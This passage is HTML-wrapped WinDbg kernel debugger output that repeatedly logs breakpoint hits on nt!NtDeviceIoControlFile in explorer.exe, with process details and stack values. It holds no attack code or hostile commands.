New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 
ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 
PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span 
style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 180 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br 
style="font-family: "Courier New",Courier,monospace;" /><pre style="font-family: "Courier New",Courier,monospace;">
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 000004ac 00000218 00000000
 f75dad48 00000000 00c9f5a4 00120090 00000000
 f75dad58 00000000 00169078 00000030
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000550 00000000 00000000
 f75dad48 00000000 00c9f544 00120003 00c9f6d4
 f75dad58 00000024 00c9f6cc 00000004
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000550 00000000 00000000
 f75dad48 00000000 00c9f544 00120003 00c9f6d4
 f75dad58 00000024 00c9f64c 0000005c
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000550 00000000 00000000
 f75dad48 00000000 00c9f544 00120003 00c9f6d4
 f75dad58 00000024 000f79b8 00000120
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000550 00000000 00000000
 f75dad48 00000000 00c9f544 00120003 00c9f6d4
 f75dad58 00000024 000de808 0000016c
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000218 00000000 00000000
 f75dad48 00000000 00c9f71c 0021009a 00000000
 f75dad58 00000000 00c9f6b8 0000003c
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000218 00000000 00000000
 f75dad48 00000000 00c9f7f8 0017003e 76477d3c
 f75dad58 0000003c 00c9f86c 000002d0
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 0000031c 00000218 00000000
 f75dad48 00000000 00c9f750 00120003 00c9f778
 f75dad58 00000024 00c9f7b8 0000005c
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 0000031c 00000218 00000000
 f75dad48 00000000 00c9f750 00120003 00c9f778
 f75dad58 00000024 00c9f7b8 0000005c
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 000004ac 00000218 00000000
 f75dad48 00000000 00c9f784 00120040 00000000
 f75dad58 00000000 01fc8008 00000c30
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000550 00000000 00000000
 f75dad48 00000000 00c9f500 00120003 00c9f5ac
 f75dad58 00000024 00168858 00000100
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 0000031c 00000218 00000000
 f75dad48 00000000 00c9f4e0 00120003 00c9f508
 f75dad58 00000024 00c9f548 0000005c
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 178 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 0000031c 00000218 00000000
 f75dad48 00000000 00c9f4e0 00120003 00c9f508
 f75dad58 00000024 00c9f548 0000005c
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 178 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 000004ac 00000218 00000000
 f75dad48 00000000 00c9f514 00120040 00000000
 f75dad58 00000000 0018ad70 00000c30
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000550 00000000 00000000
 f75dad48 00000000 00c9f544 00120003 00c9f6d4
 f75dad58 00000024 00c9f6d0 00000004
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000550 00000000 00000000
 f75dad48 00000000 00c9f544 00120003 00c9f6d4
 f75dad58 00000024 00c9f74c 000000e1
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000550 00000000 00000000
 f75dad48 00000000 00c9f544 00120003 00c9f6d4
 f75dad58 00000024 00c9f6d0 00000004
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 00000550 00000000 00000000
 f75dad48 00000000 00c9f544 00120003 00c9f6d4
 f75dad58 00000024 00c9f74c 000000e1
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
 Unable to get _HANDLE_TABLE_ENTRY : 00000a78
 f75dad38 8053ca28 000004ac 00000218 00000000
 f75dad48 00000000 00c9f5a4 00120090 00000000
 f75dad58 00000000 00169078 00000030
 nt!NtDeviceIoControlFile:
 8056d590 8bff mov edi,edi
 kd> g
 processor number 0, process 8153d8a0
 PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c
 DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.
 Image: explorer.exe

 Kernel Handle table at e166a000 with 177 Entries in use
</pre><span
style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6cc 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br 
style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f64c 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel 
Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000f79b8 00000120</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span 
style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000de808 0000016c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br 
style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 178 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000218 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f71c 0021009a 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 00c9f6b8 0000003c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br 
style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier 
New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 